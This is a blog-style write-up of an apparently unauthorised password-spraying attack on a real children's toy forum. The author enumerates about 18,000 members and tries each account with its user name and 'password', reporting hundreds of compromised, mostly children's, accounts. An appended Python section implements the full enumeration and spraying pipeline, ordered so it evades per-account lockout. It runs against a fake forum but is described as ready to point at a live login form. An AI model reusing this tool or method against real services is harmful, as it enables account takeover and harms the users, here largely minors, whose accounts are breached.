Bakugan Horizontal Brute Force
Doing a little TV hacking, I ran across the anime toy tie-in, Bakugan, and
my.bakugan.com, the forums for said tie-in. I registered for the forums and
checked out the member list. It listed 30, 60 or 90 users at a pop with that
number in the URL. With 18,000+ members, I'd rather up that number. Ten
thousand didn't work, nor did five. One thousand worked and finally two
thousand.
After grabbing the pages, I grepped for the single line that held the users.
grep_for_users.txt
Then I wrote a little perl script to get the users from those files.
getusers.pl
With all of the users in one text file, it was time to
figure out how to authenticate. Well, everything's sent in a cleartext POST.
Simple. Another perl script to iterate through the users using two passwords
per account: their user name and "password".
bakugan.pl
Here's the output. Three percent of users, granted
mostly kids, fell to one of those two guesses, with two-thirds of those using
their user name. The important lesson is that user enumeration is at least as
valuable to an adversary as unlimited login attempts: two guesses per account,
spread across 18,000 enumerated accounts, stays well under any per-account
lockout threshold and still yields hundreds of compromised accounts.
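The pipeline described above (pull the usernames out of the member list, then spray each account with its own user name and "password", one guess per account per round), as an added example in Python. This is not the author's grep/perl tooling: the member-list markup, the credential table and the lockout policy are constructed stand-ins so that it runs offline; against a live target `FakeForum.login` would be replaced by an HTTP POST of the login form.

```python
"""Enumerate users from a member list, then spray two guesses per account.

Added example, not the author's grep/perl pipeline.  The member-list markup,
the credential table and the lockout policy are constructed stand-ins so the
whole thing runs offline.
"""
import re
from collections import Counter
from typing import Callable, Dict, List

# Step 1: extract usernames.  Assumed markup: each member is an
# <a href="...member.php?u=NNN">name</a> link and the whole list sits on one
# line, which is why a single grep could pick it out.
MEMBER_LINK = re.compile(r'<a href="[^"]*member\.php\?u=\d+">([^<]+)</a>')


def extract_users(page_html: str) -> List[str]:
    """Return the usernames found on the line(s) carrying member links."""
    users: List[str] = []
    for line in page_html.splitlines():
        if "member.php?u=" in line:
            users.extend(MEMBER_LINK.findall(line))
    return users


# Step 2: the per-user guess list the post used: the user name, then "password".
def candidate_passwords(user: str) -> List[str]:
    return [user, "password"]


# Step 3: horizontal brute force.  The outer loop is the guess index and the
# inner loop is the user list, so every account sees at most one attempt per
# round; with two rounds no account is ever asked more than twice, which stays
# under any realistic per-account lockout threshold.
def spray(users: List[str], login: Callable[[str, str], bool],
          candidates: Callable[[str], List[str]] = candidate_passwords) -> Dict[str, str]:
    """Return {user: password} for every account that accepted a guess."""
    hits: Dict[str, str] = {}
    if not users:
        return hits
    rounds = max(len(candidates(u)) for u in users)
    for i in range(rounds):
        for u in users:
            if u in hits:
                continue  # already cracked; no reason to touch it again
            guesses = candidates(u)
            if i < len(guesses) and login(u, guesses[i]):
                hits[u] = guesses[i]
    return hits


def summarize(users: List[str], hits: Dict[str, str]):
    """(fraction of accounts cracked, fraction of those that used their user name)."""
    cracked = len(hits) / len(users) if users else 0.0
    by_username = sum(1 for u, p in hits.items() if p == u)
    return cracked, (by_username / len(hits) if hits else 0.0)


class FakeForum:
    """Stand-in for the cleartext POST login endpoint.  Credentials are made up."""
    LOCKOUT = 5  # assumed policy: lock the account after this many guesses

    def __init__(self) -> None:
        self._creds = {
            "dragonoid": "dragonoid",     # user name as password
            "marucho": "password",
            "shun_k": "ventus!ninja",
            "runo": "runo",               # user name as password
            "julie": "J!ulie-2008",
            "dan_kuso": "pyrus#99",
        }
        self.attempts: Counter = Counter()

    def login(self, user: str, password: str) -> bool:
        self.attempts[user] += 1
        if self.attempts[user] > self.LOCKOUT:
            return False  # locked out: even the right password fails now
        return self._creds.get(user) == password


# Constructed member-list page: one long line holds all the member links.
MEMBER_PAGE = """<html><body><h1>Members</h1>
<tr><td class="memberlist"><a href="/member.php?u=101">dragonoid</a> <a href="/member.php?u=102">marucho</a> <a href="/member.php?u=103">shun_k</a> <a href="/member.php?u=104">runo</a> <a href="/member.php?u=105">julie</a> <a href="/member.php?u=106">dan_kuso</a></td></tr>
<p>Showing 6 of 6 members</p></body></html>"""


if __name__ == "__main__":
    forum = FakeForum()
    users = extract_users(MEMBER_PAGE)
    hits = spray(users, forum.login)
    cracked, by_username = summarize(users, hits)
    print(f"{len(users)} users, {len(hits)} cracked ({cracked:.0%}); "
          f"{by_username:.0%} of those used their user name; "
          f"busiest account saw {max(forum.attempts.values())} attempts")
```

The ordering in `spray` is the point of calling this horizontal: round one sends every account its user name, round two sends "password", so the busiest account is touched twice in total. Flip the loops (all guesses against one user before moving on) and the same guess list becomes a vertical attack that a per-account lockout is designed to catch.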